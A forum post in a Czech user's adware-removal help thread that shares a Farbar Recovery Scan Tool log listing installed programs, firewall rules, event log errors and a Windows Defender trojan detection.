Re: tabs with ads keep popping up

Posted: 12 Sep 2020 11:00
by martybx
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-09-2020
Ran by Milan (12-09-2020 11:54:24)
Running from C:\Users\Milan\Desktop
Windows 10 Home Version 1909 18363.1016 (X64) (2020-03-20 21:25:00)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1738925715-1269715944-3180472622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1738925715-1269715944-3180472622-503 - Limited - Disabled)
Guest (S-1-5-21-1738925715-1269715944-3180472622-501 - Limited - Disabled)
Milan (S-1-5-21-1738925715-1269715944-3180472622-1001 - Administrator - Enabled) => C:\Users\Milan
WDAGUtilityAccount (S-1-5-21-1738925715-1269715944-3180472622-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.0.7 - philandro Software GmbH)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.6.3135 - AVG Technologies)
AVG Secure Browser (HKLM-x32\...\AVG Secure Browser) (Version: 85.0.5675.85 - Autoři prohlížeče AVG Secure Browser)
AVG Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1066.0 - AVG Technologies) Hidden
Car Mechanic Simulator 2018 Mercedes Benz (HKLM-x32\...\Car Mechanic Simulator 2018 Mercedes Benz_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 5.4.1.0928 - Disc Soft Ltd)
Dark Konflict (HKLM-x32\...\Dark Konflict) (Version: - )
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version: - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
EpsonNet Print (HKLM\...\{96ED1D58-440C-4345-8FEE-C4781366C67F}) (Version: 3.1.4.0 - SEIKO EPSON Corporation)
Euro Truck Simulator 2 v1.35.3.4S (HKLM-x32\...\tuttop.com Euro Truck Simulator 2 v1.35.3.4S_is1) (Version: 1.35.3.4S - tuttop.com)
HELLGATE London (HKLM-x32\...\HELLGATE London_is1) (Version: - )
Java 8 Update 261 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.51 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mockba to Berlin (HKLM-x32\...\{BCECC8FA-31AD-487A-A8C4-1C9C5454F9C6}_is1) (Version: 2.17 - US - ACTION, s.r.o.)
Mozilla Firefox 80.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 80.0.1 (x64 cs)) (Version: 80.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 69.0 - Mozilla)
NVIDIA Ovladače grafiky 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}) (Version: 9.10.0514 - NVIDIA Corporation)
Odinstalace tiskárny EPSON L3150 Series (HKLM\...\EPSON L3150 Series) (Version: - Seiko Epson Corporation)
Original War (HKLM-x32\...\Original War) (Version: - )
Příručky společnosti EPSON (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.56.1.0 - Seiko Epson Corporation)
S.T.A.L.K.E.R. Clear Sky (HKLM-x32\...\GOGPACKSTALKERSTCS_is1) (Version: 2.0.0.8 - GOG.com)
Siegecraft Commander (HKLM-x32\...\Siegecraft Commander_is1) (Version: - )
Skype verze 8.64 (HKLM-x32\...\Skype_is1) (Version: 8.64 - Skype Technologies S.A.)
Sniper Elite (HKLM-x32\...\{2527736B-927C-4E5F-A861-6BA616568B80}_is1) (Version: 1.0 - US - ACTION, s.r.o.)
Sorades - Die Befreiung (HKLM-x32\...\Sorades - Die Befreiung) (Version: 1.0 - diebefreiung.de)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spintires Chernobyl (HKLM-x32\...\Spintires Chernobyl_is1) (Version: - )
Splitter 9.6.0.1 (HKLM-x32\...\WAV MP3 Splitter_is1) (Version: 9.6.0.1 - Piston Software)
Surviving Mars (HKLM-x32\...\Surviving Mars_is1) (Version: - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.5.0 - TeamSpeak Systems GmbH)
The Colonists (HKLM-x32\...\1282350952_is1) (Version: V1 - GOG.com)
The Sinking City (HKLM-x32\...\The Sinking City_is1) (Version: 0.0.0 - THE KNIGHT)
The Subject (HKLM-x32\...\The Subject_is1) (Version: - )
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Train Valley 2 Passenger Flow (HKLM-x32\...\Train Valley 2 Passenger Flow_is1) (Version: - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.12.4.0_x86__kgqvnymyfvs32 [2020-08-29] (king.com)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Studios) [MS Ad]
MSN Počasí -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-08-29] (NVIDIA Corp.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveUltra] -> {F0E53CA3-02F8-40AE-9470-309F0309036F} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [DaemonShellExtImageUltra] -> {B5EBA666-2B94-4C7A-9CAA-A4539F329646} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\nvshext.dll [2019-10-04] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2020-03-21 10:40 - 2020-09-08 18:46 - 002072064 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 000310784 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 006903808 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2020-08-15 08:36 - 2020-08-15 08:36 - 003230720 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DotNetCommon\1ff547e9235b59188e9fe052625211ac\DotNetCommon.ni.dll
2018-11-29 14:21 - 2018-12-18 09:48 - 006142320 _____ (AVB Disc Soft, SIA -> Disc Soft Ltd) [File not signed] C:\Program Files\DAEMON Tools Ultra\engine.dll
2020-08-15 08:35 - 2020-08-15 08:35 - 004807680 _____ (Disc Soft Ltd) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DiscSoft.NET.Common\5eaf8b2270226ec230b3f2ddb6c2aeb0\DiscSoft.NET.Common.ni.dll
2016-09-14 14:31 - 2016-09-14 14:31 - 000500736 ____S (SEIKO EPSON CORPORATION) [File not signed] C:\WINDOWS\System32\enppmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\localhost -> localhost

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2019-03-19 06:49 - 2020-09-11 20:05 - 000000841 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Milan\AppData\Roaming\Microsoft\Windows Photo Viewer\Tapeta programu Windows Prohlížeč fotografií.jpg
DNS Servers: 213.46.172.37 - 213.46.172.36
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AF110A0F-4670-4C4D-BEE8-E19734C4583D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9C06B5BB-EDC4-4D95-B199-0729186F7C06}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{35FE486C-13A8-4115-91BE-EADD94521488}] => (Allow) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [{262D1130-0562-4ABD-9DBE-BD7A36B75E21}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D223F931-EC0B-418D-9CA1-86DED4F80FF0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{9B85BCFD-5637-46EF-A544-F5CDD031E56D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25501F14-C7E3-49B5-8AA0-F411A214A2BB}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{A3EBED2B-E21A-49AB-BEA3-6FB81621A465}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [UDP Query User{B51E31E2-FC04-4595-B7AB-A56857E725E5}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{FA9AB6ED-0A91-4065-8E02-AB57F96CA02A}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{F35B841D-2C85-46D4-9B66-2CC2D1A4A33D}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [TCP Query User{47D6DBFB-0BBF-4425-8906-78FA4190532B}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [UDP Query User{D5D966E3-E806-4944-8A51-2B58DF1551EE}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{0A47C543-177F-4283-B753-89601E79F3E0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{6608746E-BB0D-4940-80AE-71255BADFC02}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E95688B6-E055-4354-9794-DC2A141C37A9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9C304D1E-B5CB-412A-AF72-2E84EE6DCDF1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A50B23FA-CD55-4336-AD45-9DE5FF6B2823}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9D976B0F-3F56-4B50-9E8E-0DA017F266E9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D9B09C69-0FBB-4B86-A187-7F523BE921BD}] => (Allow) C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe (AVG Technologies USA, LLC -> AVG Technologies)
FirewallRules: [{B4A64F44-B7A6-4440-999A-5FFAAEF842CE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E81F9AC5-5422-4213-958F-C5671008BBC2}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E1DE6D90-F22C-4068-AAA3-43F04E202799}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{53461AB8-456B-4316-A4FF-8E6FE5C227AB}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{597C036D-4FC6-4760-B669-D78127F67E97}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{04A7F879-86AF-41FD-A67F-CD9805DD2D4F}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)

==================== Restore Points =========================

28-08-2020 22:33:27 Naplánovaný kontrolní bod
29-08-2020 18:01:40 Operace obnovení
08-09-2020 17:10:36 Naplánovaný kontrolní bod
11-09-2020 20:03:34 zoek.exe restore point
11-09-2020 21:46:05 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 8192 (0x0000000000002000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 10:11:31 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3028,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.


System errors:
=============
Error: (09/12/2020 11:41:24 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 11:41:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 10:41:31 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 10:16:32 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 10:12:07 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 10:10:19 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 09:46:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba NVIDIA Display Container LS byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 6000 milisekund: Restartovat službu.

Error: (09/11/2020 09:45:18 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-AJHPLSQ)
Description: Server Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c!App.AppXtwmqn4em5r5dpafgj4t4yyxgjfe0hr50.mca se v daném časovém limitu neregistroval u služby DCOM.


Windows Defender:
===================================
Date: 2020-08-29 22:36:38.516
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Wacatac.C!ml
ID: 2147749372
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe; file:_C:\Users\Milan\AppData\Local\Temp\acmiqlndjnf\zod1s2pvolq.exe; regkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y; runkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Windows\explorer.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

